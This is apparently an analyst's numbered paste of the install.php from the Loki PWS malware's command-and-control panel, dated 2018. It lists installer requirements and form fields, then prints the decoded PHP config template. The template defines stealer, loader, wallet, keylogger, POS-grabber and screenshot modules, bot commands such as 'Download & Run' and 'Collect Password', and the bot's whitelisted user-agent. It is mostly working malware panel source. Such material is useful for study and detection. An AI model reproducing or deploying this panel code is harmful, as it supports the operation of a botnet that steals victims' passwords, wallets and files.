2018-01-18 Loki Panel install.php

1. Panel.zip -> five/install.php
2.  
3. System requirements
4.  
5. array("mysqli_connect", "MySQLi", "apt-get install php5-mysql(i) / yum install php-mysqli"),
6. array("mcrypt_encrypt", "Mcrypt", "apt-get install php5-mcrypt / yum install php-mcrypt"),
7. array("gd_info", "GD", "apt-get install php5-gd / yum install php-gd"),
8. array("gmp_mul", "GMP", "apt-get install php5-gmp / yum install php-gmp")
9.  
10. Fields you need to enter in
11. <legend>Install - MySQL, User</legend>
12. <label for="MHost" class="col-lg-2 control-label">Hostname:</label>
13. <label for="MUser" class="col-lg-2 control-label">Username:</label>
14. <label for="MPass" class="col-lg-2 control-label">Password:</label>
15. <label for="MDatabase" class="col-lg-2 control-label">Database:</label>
16. <label for="MPort" class="col-lg-2 control-label">Port:</label>
17. <label for="MPrefix" class="col-lg-2 control-label">Prefix:</label>
18. <label><input name="UseUrl" type="checkbox">Use Auth Url (Random)</label>
19. <label for="MPort" class="col-lg-2 control-label">Useragent:</label>
20. <label for="MUser" class="col-lg-2 control-label">Username:</label>
21. <label for="MPass" class="col-lg-2 control-label">Password:</label>
22. <label for="MPass" class="col-lg-2 control-label">Password:</label>
23. <button type="submit" ...>Install</button>
24.  
25.  
26.  
27. $ConfigBuffer base64 decoded ...
28.  
29. <?php
30. if (basename($_SERVER['PHP_SELF']) == basename(__FILE__)) die("File not found.");
31.  
32. @date_default_timezone_set('Europe/Minsk');
33. @set_time_limit(NULL);
34. @ini_set('max_execution_time', NULL);
35.  
36. $DBData = array
37. (
38. 'hostname' => "<MYSQLHOST>",
39. 'username' => "<MYSQLUSER>",
40. 'password' => "<MYSQLPASS>",
41. 'database' => "<MYSQLDB>",
42. 'port' => <MYSQLPORT>,
43. 'prefix' => "<MYSQLPREFIX>",
44. 'aes_key' => 0,
45. );
46.  
47. define("IN_LOKI", TRUE);
48.  
49. define("LANG_DB", "lang.db.php");
50. define("TITLE", "Loki PWS");
51.  
52. define("LANG_", "en");
53. define("E404_", "File not found.");
54.  
55. define("DEBUG_", TRUE);
56. define("CAPTCHA", <USECAPTCHA>);
57. define("AUTH_URL", <USEURL>);
58. define("AUTH_AGENT", <USEAGENT>);
59.  
60. define("TEMP_", "<TMPDIR>");
61. define("URL_", "<URL>");
62. define("AGENT_", "<AGENT>");
63. define("INCLUDE_", "<INCLUDE>");
64. define("WALLET_", "<WEBKEY>");
65. define("ENCKEY_", "<FILEKEY>");
66. define("COOKIE_", "<COOKIE>");
67. define("EXTENSION_", ".txt");
68.  
69. define("ACTVALUE_", "<RAND1>");
70. define("OPTVALUE_", "<RAND2>");
71. define("AUTHVALUE_", "<RAND3>");
72.  
73. define("MODULE_STEALER", <STEALER>);
74. define("MODULE_LOADER", <LOADER>);
75. define("MODULE_WALLET", <WALLET>);
76. define("MODULE_FILE_GRABBER", <FILEGRABBER>);
77. define("MODULE_STRESSER", <STRESSER>);
78. define("MODULE_POS_GRABBER", <POSGRABBER>);
79. define("MODULE_KEYLOGGER", <KEYLOGGER>);
80. define("MODULE_SCREENSHOT", <SCREENSHOT>);
81.  
82. if(DEBUG_)
83. {
84. @ini_set('display_errors','On');
85. @ini_set('error_reporting', E_ALL);
86. }
87. else
88. {
89. @ini_set('display_errors','Off');
90. @ini_set('error_reporting', NULL);
91. }
92.  
93.  
94. $White_BotAgents_Lists = array ("Mozilla/4.08 (Charon; Inferno)");
95. $White_Lists = array();
96.  
97. $Lang = LANG_;
98. $PageLimitDB = array ( 10, 20, 30, 50, 100);
99. $PageLimit = 10;
100. $PageID = 1;
101.  
102. $PrivilegesDB = array
103. (
104. 0 => 'Read, Export, Delete, Settings, .. (ALL)',
105. 1 => 'Read, Export, Delete'
106. );
107.  
108. $CommandsDB = array
109. (
110. 0 => 'Download & Run',
111. 1 => 'Download & Load',
112. 2 => 'Download & Drop',
113. 3 => '-',
114. 8 => 'Remove Hash DB',
115. 9 => 'Enable Keylogger',
116. 10 => 'Collect Password',
117. 11 => 'Collect Wallet',
118. 12 => 'Collect File',
119. 13 => 'Collect Bin/Dump',
120.  
121. 14 => 'Shutdown Bot (Only Bot, not PC)',
122. 15 => 'Update Bot',
123. 16 => 'Update reconnect intervall',
124. 17 => 'Uninstall Bot',
125. 18 => 'Screenshot',
126. );
127.  
128. $Page = array();
129.  
130. if(MODULE_LOADER)
131. {
132. if(!MODULE_STRESSER)
133. unset($CommandsDB[3]);
134. if(!MODULE_FILE_GRABBER)
135. unset($CommandsDB[12]);
136. if(!MODULE_POS_GRABBER)
137. unset($CommandsDB[13]);
138. if(!MODULE_KEYLOGGER)
139. unset($CommandsDB[10]);
140.  
141. $Page = array
142. (
143. array("main", "Main"),
144. array(" ", "Bots",
145. array(
146. array("bot", "Bots"),
147. array(" ", "divider"),
148. array("command", "Commands")
149. )),
150.  
151. array(" ", "Reports",
152. array(
153. array("report", "Reports"),
154. array(" ", "divider"),
155. array("http", "HTTP"),
156. array("ftp", "FTP/SSH"),
157. array("other", "Others"),
158. array("wallet", "Wallet"),
159. array("dump", "Dumps")
160. )),
161.  
162. array("settings", "Settings"),
163. array("exit", "Exit")
164. );
165.  
166. if(!MODULE_STEALER)
167. {
168. unset($Page[2][2][2]);
169. unset($Page[2][2][3]);
170. unset($Page[2][2][4]);
171. unset($CommandsDB[10]);
172. }
173. if(!MODULE_WALLET)
174. {
175. unset($CommandsDB[11]);
176. unset($Page[2][2][5]);
177. }
178. if(!MODULE_SCREENSHOT)
179. unset($CommandsDB[18]);
180. if(!MODULE_POS_GRABBER)
181. unset($Page[2][2][6]);
182. }
183. else
184. {
185. $Page = array
186. (
187. array("main", "Main"),
188. array("http", "HTTP"),
189. array("ftp", "FTP/SSH"),
190. array("other", "Others"),
191. array("wallet", "Wallet"),
192. array("dumps", "Dumps"),
193. array("report", "Reports"),
194. array("settings", "Settings"),
195. array("exit", "Exit")
196. );
197.  
198. if(!MODULE_STEALER)
199. {
200. unset($Page[1]);
201. unset($Page[2]);
202. unset($Page[3]);
203.  
204. unset($CommandsDB[10]);
205. }
206.  
207. if(!MODULE_POS_GRABBER)
208. unset($Page[5]);
209.  
210. if(!MODULE_WALLET)
211. unset($Page[4]);
212. }
213. ?>